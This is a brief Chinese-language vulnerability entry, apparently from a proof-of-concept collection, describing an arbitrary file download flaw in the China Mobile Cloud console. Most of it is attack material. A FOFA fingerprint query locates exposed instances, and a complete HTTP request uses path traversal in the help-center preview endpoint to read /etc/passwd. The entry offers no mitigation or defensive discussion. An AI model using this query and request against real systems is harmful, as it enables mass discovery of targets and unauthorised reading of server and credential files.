中国移动云控制台是一套用于统一查看和管理移动云产品及服务的系统,移动云控制台存在文件任意下载漏洞,攻击者可利用此漏洞获取任意文件信息。
- 中国移动云控制台
- fofa
body="op-login-static/favicon.ico" || header="/oauth2/code/opgateway"
- 特征
GET /api/query/helpcenter/api/v2/preview?fileName=../../../../../../../../etc/passwd HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
更新: 2024-06-11 10:30:33
原文: https://www.yuque.com/xiaokp7/ocvun2/sh18y2kvdy1ou9gn